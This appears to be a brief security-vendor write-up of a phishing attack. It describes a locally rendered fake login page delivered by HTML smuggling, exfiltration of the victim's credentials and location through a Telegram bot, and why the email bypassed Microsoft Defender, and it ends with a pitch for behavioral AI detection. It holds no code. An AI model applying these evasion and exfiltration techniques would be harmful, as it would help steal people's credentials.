Phishing Interface: Email features a compact web interface mimicking a document sharing login page, rendered locally on the user's device.
From Email to Telegram: HTML Smuggling in Action
Dynamic Phishing Interface Rendered Locally Bypassing Microsoft Defender O365
What is the attack?
Credential Submission: Victim is redirected to a OneDrive page with a decoy PDF after entering credentials.
Data Exfiltration: Victim’s geolocation, email, and credentials are covertly sent using a Telegram bot.
Why did it get through?
Legitimate Source: Email sent from a domain passing sender authentication checks.
Self-Contained UI: The Sign-In interface operates entirely locally, eliminating external requests
Telegram App: Victim information including credentials and IP address are transmitted through legitimate Telegram API requests.
What is required to solve for this attack?
Behavioral Detection: Abnormal’s Behavioral AI flags never-before-seen senders, unusual email content, and user communication patterns to identify attacks.
Attachment Analysis: Through Content Analysis and Natural Language Processing, Abnormal understands the context, content, and type of attached files.